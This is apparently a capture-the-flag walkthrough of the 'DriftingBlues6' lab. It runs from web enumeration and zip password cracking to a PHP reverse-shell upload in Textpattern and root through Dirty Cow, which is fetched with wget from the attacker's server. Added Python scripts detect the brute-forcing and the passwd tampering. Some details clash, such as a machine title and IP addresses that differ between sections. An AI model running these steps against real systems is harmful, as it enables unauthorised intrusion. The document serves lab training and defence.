In this walkthrough, we will be going through the DriftingBlues6 room from Proving Grounds. This room is rated Easy on the platform and consists of basic enumeration of the Textpattern CMS, which later results in RCE on the target. The privilege escalation part requires the use of a popular Linux kernel exploit. So, let’s get started without any delay.
Machine Info:
| Field | Value |
|---|---|
| Title | Monitoring |
| IP address | 192.168.225.136 |
| Difficulty | Easy |
| OS | Linux |
| Description | DriftingBlues6 is an easy rated machine that involves basic enumeration of the Textpattern CMS, which later results in RCE on the target. The privilege escalation part requires the use of a popular Linux kernel exploit. |
Enumeration:
- I started off with my regular nmap aggressive scan and found only one port open – 80 (HTTP).
```
$ sudo nmap -A 192.168.223.219
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-09 14:18 IST
Nmap scan report for 192.168.223.219
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: driftingblues
| vulners:
|   cpe:/a:apache:http_server:2.2.22:
|     [... long list of CVE and exploit references for Apache 2.2.22 trimmed ...]
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
[... OS fingerprint trimmed ...]
Network Distance: 4 hops

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   206.53 ms 192.168.45.1
2   206.53 ms 192.168.45.254
3   206.57 ms 192.168.251.1
4   206.66 ms 192.168.223.219

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.85 seconds
```
- Enumerated the web server running on port 80 and found a static page with information related to an album, I guess.
- Fired gobuster at the target to reveal some hidden directories. The two interesting ones were /robots and /textpattern.
```
$ gobuster dir -u http://192.168.223.219/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.223.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/09 14:31:28 Starting gobuster in directory enumeration mode
===============================================================
/db                   (Status: 200) [Size: 53656]
/index                (Status: 200) [Size: 750]
/robots               (Status: 200) [Size: 110]
/textpattern          (Status: 301) [Size: 324] [--> http://192.168.223.219/textpattern/]
/server-status        (Status: 403) [Size: 296]
===============================================================
2024/01/09 14:38:03 Finished
===============================================================
```
- Checked the robots.txt file; it contains an entry disallowing crawler access to a specific directory: /textpattern/textpattern.
- I first enumerated the /textpattern directory and it showed me a page that looks like the front page of a blog. Found nothing interesting here, as the links were also pointing to a non-accessible host.
- Next, I moved to the /textpattern/textpattern directory and it revealed a login page, confirming the Textpattern CMS. I then performed a directory bruteforce again and found another directory, /textpattern, which reveals the version we are dealing with here: 4.8.3. This might come in handy later.
- At this point, I searched for the default creds of Textpattern CMS but found nothing credible. Next, I tried a bunch of common username and password combos, but still had no luck. Finally, after a lot of irrelevant enumeration, I once again performed a directory bruteforce on the root directory with a different wordlist, and this time it gave me another directory, “spammer”, which contains a zip file called spammer.zip.
```
$ gobuster dir -u http://192.168.216.219/ -w ~/Desktop/Wordlist/directory-medium.txt -x zip
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.216.219/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/directory-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              zip
[+] Timeout:                 10s
===============================================================
2024/01/10 13:52:16 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 750]
/db                   (Status: 200) [Size: 53656]
/robots               (Status: 200) [Size: 110]
/spammer              (Status: 200) [Size: 179]
/spammer.zip          (Status: 200) [Size: 179]
```
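From the defender's side, both gobuster runs above leave a very recognisable trail in the Apache access log: one client, a burst of 404s, a scanner user agent, and a handful of hits (/db, /robots, /textpattern, /spammer.zip) that are exactly the exposures worth reviewing. The following detection script is an added example, not part of the original walkthrough; the log lines are constructed to imitate that run, and the scanner user-agent list is an assumption you would tune to your environment.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format log lines imitating the gobuster run above.
# These records are made up for this example; they are not logs from the target.
SAMPLE_LOG = """\
192.168.45.240 - - [09/Jan/2024:14:31:28 +0530] "GET /cgi-bin/ HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
192.168.45.240 - - [09/Jan/2024:14:31:28 +0530] "GET /images HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
192.168.45.240 - - [09/Jan/2024:14:31:29 +0530] "GET /db HTTP/1.1" 200 53656 "-" "gobuster/3.1.0"
192.168.45.240 - - [09/Jan/2024:14:31:29 +0530] "GET /robots HTTP/1.1" 200 110 "-" "gobuster/3.1.0"
192.168.45.240 - - [09/Jan/2024:14:31:30 +0530] "GET /backup HTTP/1.1" 404 296 "-" "gobuster/3.1.0"
192.168.45.240 - - [09/Jan/2024:14:31:30 +0530] "GET /textpattern HTTP/1.1" 301 324 "-" "gobuster/3.1.0"
192.168.45.240 - - [09/Jan/2024:14:31:31 +0530] "GET /spammer.zip HTTP/1.1" 200 179 "-" "gobuster/3.1.0"
10.0.0.7 - - [09/Jan/2024:14:32:01 +0530] "GET / HTTP/1.1" 200 750 "-" "Mozilla/5.0"
10.0.0.7 - - [09/Jan/2024:14:32:05 +0530] "GET /favicon.ico HTTP/1.1" 404 296 "-" "Mozilla/5.0"
"""

# Client IP, request path, status code and user agent are all we need per line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Assumed list of user-agent prefixes of common directory brute-forcing tools.
SCANNER_UA = ("gobuster", "dirbuster", "feroxbuster", "ffuf", "dirb")

def parse_line(line):
    """Return (ip, path, status, user_agent), or None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), int(m.group("status")), m.group("ua")

def find_bruteforce(log_text, not_found_threshold=3):
    """Flag clients that identify as a known scanner or pile up 404s, and list
    the non-404 paths each flagged client reached: those are the exposures
    (here /db, /robots, /textpattern, /spammer.zip) a defender should review."""
    per_ip = defaultdict(lambda: {"requests": 0, "not_found": 0,
                                  "scanner_ua": False, "found": []})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip lines that are not in combined log format
        ip, path, status, ua = parsed
        rec = per_ip[ip]
        rec["requests"] += 1
        if status == 404:
            rec["not_found"] += 1
        elif path not in rec["found"]:
            rec["found"].append(path)
        if ua.lower().startswith(SCANNER_UA):
            rec["scanner_ua"] = True
    return {ip: rec for ip, rec in per_ip.items()
            if rec["scanner_ua"] or rec["not_found"] >= not_found_threshold}
```

Run `find_bruteforce(open("/var/log/apache2/access.log").read())` on a real log; note that a scanner can trivially spoof its user agent, so the 404 threshold is the check to rely on.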
Initial Access:
- Downloaded the zip file to my local machine; however, it was protected with a password. So I cracked the password using john: myspace4.
```
$ zip2john spammer.zip > hash
$ john hash
myspace4
```
- After unzipping the file, I got the Textpattern backend creds.
```
$ unzip spammer.zip
mayer:lionheart
```
- Logged into the dashboard. Now I looked for any known exploits for the running version of the application and found that it is vulnerable to an authenticated RCE vulnerability. I tried the available exploits, but they tended to fail, so I performed the exploitation manually.
- Uploaded my PHP reverse shell payload using the application’s Files section, which can be found under the “Content” tab in the header menu.
- Executed my payload by visiting the below URL and got the connection back at my netcat listener.
Privilege Escalation:
- Checked the running kernel version number and it shows 3.2.0-4-amd64, which is quite old. So I checked for known exploits for it and found that it is vulnerable to the “Dirty Cow” vulnerability.
- Transferred the below exploit onto the target by spawning an HTTP server on my local machine.
Exploit: https://www.exploit-db.com/exploits/40839
```
wget http://192.168.45.240:8000/40839.c
```
- Compiled and executed the exploit. The exploit will prompt you to enter a password for the new user, which will have root privileges. It may take a minute to complete.
```
gcc -pthread 40839.c -o exploit -lcrypt
chmod +x exploit
./exploit
```
- After the process is complete, switched to the newly created root user, thus getting root on the target.
```
$ su firefart
Password:
```
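The privilege escalation above does not leave a clean trail: the exploit writes a new UID 0 account into /etc/passwd in place of the existing root line, which is why the author has to `su firefart`. A host-level audit that catches both symptoms (a UID 0 account that is not root, and a missing root entry) is shown below as an added example, not part of the original walkthrough; the passwd contents are constructed, and HASHPLACEHOLDER stands in for whatever hash the exploit generates.

```python
# Constructed /etc/passwd contents for this example. TAMPERED_PASSWD mirrors the
# state the Dirty Cow exploit used above leaves behind: root's line overwritten by a
# same-length UID-0 "firefart" entry. HASHPLACEHOLDER replaces the generated hash.
TAMPERED_PASSWD = """\
firefart:HASHPLACEHOLDER:0:0:pwned:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
someuser:x:1000:1000:,,,:/home/someuser:/bin/bash
"""
CLEAN_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
someuser:x:1000:1000:,,,:/home/someuser:/bin/bash
"""

def parse_passwd(text):
    """Yield (name, uid, gid, home, shell) for each 7-field passwd line. A line
    that does not parse is itself suspicious, so it raises rather than being skipped."""
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not (fields[2].isdigit() and fields[3].isdigit()):
            raise ValueError(f"malformed passwd line {n}: {line!r}")
        yield fields[0], int(fields[2]), int(fields[3]), fields[5], fields[6]

def audit_passwd(text):
    """Return human-readable findings for UID-0 anomalies: any account other than
    root carrying UID 0, and a missing root entry (what an in-place overwrite produces)."""
    findings, names = [], set()
    for name, uid, gid, home, shell in parse_passwd(text):
        names.add(name)
        if uid == 0 and name != "root":
            findings.append(f"UID 0 account that is not root: {name} "
                            f"(gid={gid}, home={home}, shell={shell})")
    if "root" not in names:
        findings.append("no 'root' entry: the original line was likely overwritten")
    return findings

def audit_file(path="/etc/passwd"):
    """Run the audit against a real passwd file, e.g. from a cron job or agent."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())
```

An empty list from `audit_file()` means no UID 0 anomaly was found; pairing this with file-integrity monitoring on /etc/passwd catches the write itself rather than only its result.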
Conclusion:
So that was “DriftingBlues6” for you. We started off with a regular nmap scan and found only one port open: 80 (HTTP). Enumerated the web server on port 80 and found a Textpattern login panel. Fired gobuster at the target and found a spammer.zip file. Next, used john to crack the password of the zip file. The zip file reveals the password of the Textpattern login panel. Used the same to get into the backend of the Textpattern CMS. Next, abused the file upload functionality to get initial access on the target. For privilege escalation, found out that the Linux kernel version running is vulnerable to the Dirty Cow exploit. Used the same to get root on the target. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.